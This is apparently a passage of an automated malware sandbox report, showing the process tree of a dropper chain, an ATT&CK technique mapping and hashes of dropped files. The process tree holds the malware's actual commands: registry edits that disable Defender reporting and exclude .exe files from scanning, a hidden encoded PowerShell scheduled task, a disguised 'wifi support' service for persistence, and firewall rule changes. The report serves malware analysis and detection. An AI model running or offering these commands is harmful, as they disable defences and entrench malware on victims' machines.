/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:25904

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:35596

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:38648

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:37396

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:36420

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:34496

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:38372

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "glgPccBMK" /SC once /ST 02:52:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:38900

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "glgPccBMK"
7⤵
PID:9500

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "glgPccBMK"
7⤵
PID:41456

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "byVvvJzqHyAXVQJIoq" /SC once /ST 18:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MRGaWINvOOawiIKjY\aMyeiuQKFoHICpx\TkRWXIx.exe\" to /site_id 525403 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:43900

C:\Users\Admin\Pictures\Adobe Films\9dUFrvWwHF38szKt0Xurhg26.exe
"C:\Users\Admin\Pictures\Adobe Films\9dUFrvWwHF38szKt0Xurhg26.exe" /SP-/VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /pid=747
4⤵
PID:34196

C:\Users\Admin\AppData\Local\Temp\is-SFAH6.tmp\9dUFrvWwHF38szKt0Xurhg26.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SFAH6.tmp\9dUFrvWwHF38szKt0Xurhg26.tmp" /SL5="$30338,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\9dUFrvWwHF38szKt0Xurhg26.exe" /SP-/VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /pid=747
5⤵
PID:35452

C:\Users\Admin\Pictures\Adobe Films\6HQ4SSP2Vk8UtXk3iIoGJB02.exe
"C:\Users\Admin\Pictures\Adobe Films\6HQ4SSP2Vk8UtXk3iIoGJB02.exe"
4⤵
PID:34224

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\SETUP_~1.EXE
5⤵
PID:8228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA2AA==
6⤵
PID:6072

C:\Users\Admin\Pictures\Adobe Films\PUqQIkq0ln_enFgYVKWpwJ8c.exe
"C:\Users\Admin\Pictures\Adobe Films\PUqQIkq0ln_enFgYVKWpwJ8c.exe"
4⤵
PID:3728

C:\Users\Admin\Pictures\Adobe Films\8EdtVGuqmqGYfTk1ExjB1PEo.exe
"C:\Users\Admin\Pictures\Adobe Films\8EdtVGuqmqGYfTk1ExjB1PEo.exe"
4⤵
PID:8652

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Breaks.mil & ping -n 5 localhost
5⤵
PID:35956

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:37260

C:\Users\Admin\Pictures\Adobe Films\oth68gtHnjc1f7VcJwaDBD45.exe
"C:\Users\Admin\Pictures\Adobe Films\oth68gtHnjc1f7VcJwaDBD45.exe"
2⤵
PID:1544

C:\Windows\SysWOW64\choice.exe
choice 3489834785637788484436574374756367847583
3⤵
PID:316

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Breaks.mil & ping -n 5 localhost
3⤵
PID:5780

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:6788

C:\Users\Admin\Pictures\Adobe Films\LgKFYka76axHmcXZrZ8vDUR9.exe
"C:\Users\Admin\Pictures\Adobe Films\LgKFYka76axHmcXZrZ8vDUR9.exe"
2⤵
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 1372
3⤵
- Program crash
PID:12496

C:\Users\Admin\Pictures\Adobe Films\xxxlzx_Kue9u1Zg1ICKD6IfE.exe
"C:\Users\Admin\Pictures\Adobe Films\xxxlzx_Kue9u1Zg1ICKD6IfE.exe"
2⤵
PID:3816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ktbykgmb\
3⤵
PID:6012

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\pawbslxm.exe" C:\Windows\SysWOW64\ktbykgmb\
3⤵
PID:4264

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create ktbykgmb binPath= "C:\Windows\SysWOW64\ktbykgmb\pawbslxm.exe /d\"C:\Users\Admin\Pictures\Adobe Films\xxxlzx_Kue9u1Zg1ICKD6IfE.exe\"" type= own start= auto DisplayName= "wifi support"
3⤵
- Launches sc.exe
PID:2820

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description ktbykgmb "wifi internet conection"
3⤵
- Launches sc.exe
PID:2276

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ktbykgmb
3⤵
- Launches sc.exe
PID:6428

C:\Users\Admin\kwftsoxc.exe
"C:\Users\Admin\kwftsoxc.exe" /d"C:\Users\Admin\Pictures\Adobe Films\xxxlzx_Kue9u1Zg1ICKD6IfE.exe"
3⤵
PID:6844

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yewlqja.exe" C:\Windows\SysWOW64\ktbykgmb\
4⤵
PID:7636

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config ktbykgmb binPath= "C:\Windows\SysWOW64\ktbykgmb\yewlqja.exe /d\"C:\Users\Admin\kwftsoxc.exe\""
4⤵
- Launches sc.exe
PID:4520

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ktbykgmb
4⤵
- Launches sc.exe
PID:8216

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
- Modifies Windows Firewall
PID:8640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6844 -s 1156
4⤵
- Program crash
PID:8932

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
3⤵
- Modifies Windows Firewall
PID:6752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 1036
3⤵
- Program crash
PID:7116

C:\Users\Admin\Pictures\Adobe Films\Pz53Z6X3wUNIGMiT36uSXlN7.exe
"C:\Users\Admin\Pictures\Adobe Films\Pz53Z6X3wUNIGMiT36uSXlN7.exe"
2⤵
PID:2220

C:\Users\Admin\Pictures\Adobe Films\HaF7gh7Y8Cm0xiOSsdDl2b6N.exe
"C:\Users\Admin\Pictures\Adobe Films\HaF7gh7Y8Cm0xiOSsdDl2b6N.exe"
2⤵
PID:3968

C:\Users\Admin\Pictures\Adobe Films\L3EejF3_cYRjsyiGYcGq1Gw7.exe
"C:\Users\Admin\Pictures\Adobe Films\L3EejF3_cYRjsyiGYcGq1Gw7.exe"
2⤵
PID:2684

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
3⤵
PID:376

C:\Windows\system32\cmd.exe
cmd /C "wmic path win32_VideoController get name"
3⤵
PID:6780

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
PID:3728

C:\Users\Admin\AppData\Local\Temp\is-H7KP1.tmp\is-DFB3D.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H7KP1.tmp\is-DFB3D.tmp" /SL4 $202AA "C:\Users\Admin\Pictures\Adobe Films\PUqQIkq0ln_enFgYVKWpwJ8c.exe" 2106088 52736
5⤵
PID:35140

C:\Windows\system32\cmd.exe
cmd /C "wmic cpu get name"
3⤵
PID:8392

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
4⤵
PID:7816

C:\Users\Admin\Pictures\Adobe Films\zqpZse94KtKK55a9d60EfHxK.exe
"C:\Users\Admin\Pictures\Adobe Films\zqpZse94KtKK55a9d60EfHxK.exe"
2⤵
PID:1820

C:\Users\Admin\Pictures\Adobe Films\RLA7WRukrVrDtk9n_70w4448.exe
"C:\Users\Admin\Pictures\Adobe Films\RLA7WRukrVrDtk9n_70w4448.exe"
2⤵
PID:5036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:5736

C:\Users\Admin\Pictures\Adobe Films\JvLER7378kk_ue7UdXOBTiGJ.exe
"C:\Users\Admin\Pictures\Adobe Films\JvLER7378kk_ue7UdXOBTiGJ.exe"
2⤵
PID:1688

C:\Users\Admin\Pictures\Adobe Films\BlCJcZ1wHm9d507xOv3VrX9e.exe
"C:\Users\Admin\Pictures\Adobe Films\BlCJcZ1wHm9d507xOv3VrX9e.exe"
2⤵
PID:4196

C:\Users\Admin\Pictures\Adobe Films\BlCJcZ1wHm9d507xOv3VrX9e.exe
"C:\Users\Admin\Pictures\Adobe Films\BlCJcZ1wHm9d507xOv3VrX9e.exe" -q
3⤵
PID:6108

C:\Users\Admin\Pictures\Adobe Films\FZDfg2Rf2RoUVB6rzIcnC__c.exe
"C:\Users\Admin\Pictures\Adobe Films\FZDfg2Rf2RoUVB6rzIcnC__c.exe"
2⤵
PID:952

C:\Users\Admin\Pictures\Adobe Films\FkNYXxSL5dk0c9L1MVBL85DA.exe
"C:\Users\Admin\Pictures\Adobe Films\FkNYXxSL5dk0c9L1MVBL85DA.exe"
2⤵
PID:4024

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" -Y .\4h8Y.XKh
3⤵
PID:5452

C:\Users\Admin\Pictures\Adobe Films\lgefZDRbYC9utDfP3W1ir5_f.exe
"C:\Users\Admin\Pictures\Adobe Films\lgefZDRbYC9utDfP3W1ir5_f.exe"
2⤵
PID:396

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:5100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5016 -ip 5016
1⤵
PID:4192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2176 -ip 2176
1⤵
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5016 -ip 5016
1⤵
PID:4484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5016 -ip 5016
1⤵
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5016 -ip 5016
1⤵
- Executes dropped EXE
PID:2216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5016 -ip 5016
1⤵
PID:2132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5016 -ip 5016
1⤵
PID:3284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5016 -ip 5016
1⤵
PID:1440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5016 -ip 5016
1⤵
PID:3660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5016 -ip 5016
1⤵
PID:4928

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3816 -ip 3816
1⤵
PID:6920

C:\Windows\SysWOW64\luczlhnc\jzbofxi.exe
C:\Windows\SysWOW64\luczlhnc\jzbofxi.exe /d"C:\Users\Admin\Pictures\Adobe Films\GfLDOZkhElGvgVVjmIsy5R_b.exe"
1⤵
PID:3104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Windows\TEMP\mcvtqzgf.exe" C:\Windows\SysWOW64\ktbykgmb\
2⤵
PID:8324

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config ktbykgmb binPath= "C:\Windows\SysWOW64\ktbykgmb\mcvtqzgf.exe /d\"C:\Windows\SysWOW64\luczlhnc\jzbofxi.exe\""
2⤵
- Launches sc.exe
PID:8884

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ktbykgmb
2⤵
- Launches sc.exe
PID:9208

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
- Modifies Windows Firewall
PID:8012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\5105.bat" "
2⤵
PID:5908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 1004
2⤵
- Program crash
PID:9460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4948 -ip 4948
1⤵
PID:6532

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:7952

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
PID:8008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 600
3⤵
- Program crash
PID:1212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 8008 -ip 8008
1⤵
PID:6148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6844 -ip 6844
1⤵
PID:8696

C:\Windows\SysWOW64\ktbykgmb\yewlqja.exe
C:\Windows\SysWOW64\ktbykgmb\yewlqja.exe /d"C:\Users\Admin\kwftsoxc.exe"
1⤵
PID:8844

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Windows\TEMP\icsjmknw.exe" C:\Windows\SysWOW64\ktbykgmb\
2⤵
PID:9760

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config ktbykgmb binPath= "C:\Windows\SysWOW64\ktbykgmb\icsjmknw.exe /d\"C:\Windows\SysWOW64\ktbykgmb\yewlqja.exe\""
2⤵
- Launches sc.exe
PID:10340

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ktbykgmb
2⤵
- Launches sc.exe
PID:11196

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
- Modifies Windows Firewall
PID:13628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8844 -s 1208
2⤵
- Program crash
PID:13892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 3104 -ip 3104
1⤵
PID:7948

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:6288

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
PID:9360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9360 -s 600
3⤵
- Program crash
PID:10036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 9360 -ip 9360
1⤵
PID:9652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3848 -ip 3848
1⤵
PID:12260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 652 -ip 652
1⤵
PID:12552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 8844 -ip 8844
1⤵
PID:13704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 33796 -ip 33796
1⤵
PID:34888

C:\Windows\SysWOW64\choice.exe
choice 3489834785637788484436574374756367847583
1⤵
PID:35076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2484 -ip 2484
1⤵
PID:34712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:39752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:39680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 40468 -ip 40468
1⤵
PID:41044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 40752 -ip 40752
1⤵
PID:41220

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:41212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 35512 -ip 35512
1⤵
PID:41640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 8940 -ip 8940
1⤵
PID:5936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 40468 -ip 40468
1⤵
PID:42196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 40752 -ip 40752
1⤵
PID:42220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 35512 -ip 35512
1⤵
PID:42712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 8940 -ip 8940
1⤵
PID:42212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 40752 -ip 40752
1⤵
PID:4992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 40468 -ip 40468
1⤵
PID:4084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 33920 -ip 33920
1⤵
PID:43084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 8088 -ip 8088
1⤵
PID:43132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 35512 -ip 35512
1⤵
PID:43068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 8940 -ip 8940
1⤵
PID:43544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 40468 -ip 40468
1⤵
PID:43848

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:43900

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
PID:43928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 43928 -s 600
3⤵
- Program crash
PID:40232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 40752 -ip 40752
1⤵
PID:43880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 43928 -ip 43928
1⤵
PID:42900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 35512 -ip 35512
1⤵
PID:35532

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:43020

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
PID:37312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 8940 -ip 8940
1⤵
PID:41092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 37312 -ip 37312
1⤵
PID:40672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8940 -ip 8940
1⤵
PID:43200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 40752 -ip 40752
1⤵
PID:42692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 40468 -ip 40468
1⤵
PID:36236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 35512 -ip 35512
1⤵
PID:44228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 8940 -ip 8940
1⤵
PID:44496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 40468 -ip 40468
1⤵
PID:44596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 40752 -ip 40752
1⤵
PID:44920

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:41692

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
ec8ff3b1ded0246437b1472c69dd1811

SHA1
d813e874c2524e3a7da6c466c67854ad16800326

SHA256
e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

SHA512
e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
d2519bf4de1ef544316b6efed7299f1a

SHA1
9ebdcc040e0a01cb0345fd71bbec50e6ba785b35

SHA256
ac6ca27c14d15e4787d585b7cb60858ab4b1e4f2abee5ade3eada072ba738cd6

SHA512
1f3f36c2addc035ffe15537a891a732da51a1408e47c80b0e5672377d8d0ffb38eb42f676f305274c772168b3c0fa50c9ba2197e5270cacd8eede7e9401b0708

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed010bd23656.exe
Filesize
900KB

MD5
627921c5516546bf5e3c022bc732315d

SHA1
c15421b4ebf2c992fd6698c44043f1d0c24d0f6e

SHA256
d01e7379a9d2440076a17d88a848deedc1e9187f5697bc644de67cae2d08caf6

SHA512
66e5a7eacb4b2d1ec9bcf6bd340cede116db39707efc7e6a7fb8ec93ba3abd2cc8fb023bd971b9da41b69d9469c0445bf821784466bbdd52d5e456d7cd9f4994

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed010bd23656.exe
Filesize
900KB

MD5
627921c5516546bf5e3c022bc732315d

SHA1
c15421b4ebf2c992fd6698c44043f1d0c24d0f6e

SHA256
d01e7379a9d2440076a17d88a848deedc1e9187f5697bc644de67cae2d08caf6

SHA512
66e5a7eacb4b2d1ec9bcf6bd340cede116db39707efc7e6a7fb8ec93ba3abd2cc8fb023bd971b9da41b69d9469c0445bf821784466bbdd52d5e456d7cd9f4994

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed010dc6015ee.exe
Filesize
748KB

MD5
550dfc282a7f90bb87b21108fe29327e

SHA1
8bf22e0751de1700f5b0794679356754863aa108

SHA256
b4ab4fb943a460764b2a04299d286279a23475a0cf91b01a5baaf31fae207b7c

SHA512
5815a56477d61f461fb460ea5cfb720f7978e0d059a1e8f6d6ba953105334e69538b0670bde0da8ef42858f0d7b131c926591c23db5ef3952ed72c10602a96b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed010dc6015ee.exe
Filesize
748KB

MD5
550dfc282a7f90bb87b21108fe29327e

SHA1
8bf22e0751de1700f5b0794679356754863aa108

SHA256
b4ab4fb943a460764b2a04299d286279a23475a0cf91b01a5baaf31fae207b7c

SHA512
5815a56477d61f461fb460ea5cfb720f7978e0d059a1e8f6d6ba953105334e69538b0670bde0da8ef42858f0d7b131c926591c23db5ef3952ed72c10602a96b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed011301c1f8269d.exe
Filesize
389KB

MD5
b3297e6a01982c405b14ae61e4d08f50

SHA1
857e4bca996e204bfa0b3713cd4ada71096edf0c

SHA256
c37e330f97f7a2b2ec7c3ad76f1770dc75198b384dd6be64b6c5c8aa336c50da

SHA512
f614ba048d184bce6818e0d97fafbb40d82e279aeb2322b79005007229fd1cf115a510c5d88f48429354ba396738fe7e08f25715afbe897de7333c305c8fdd1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8C0BBAB6\Wed011301c1f8269d.exe
Filesize
389KB

MD5
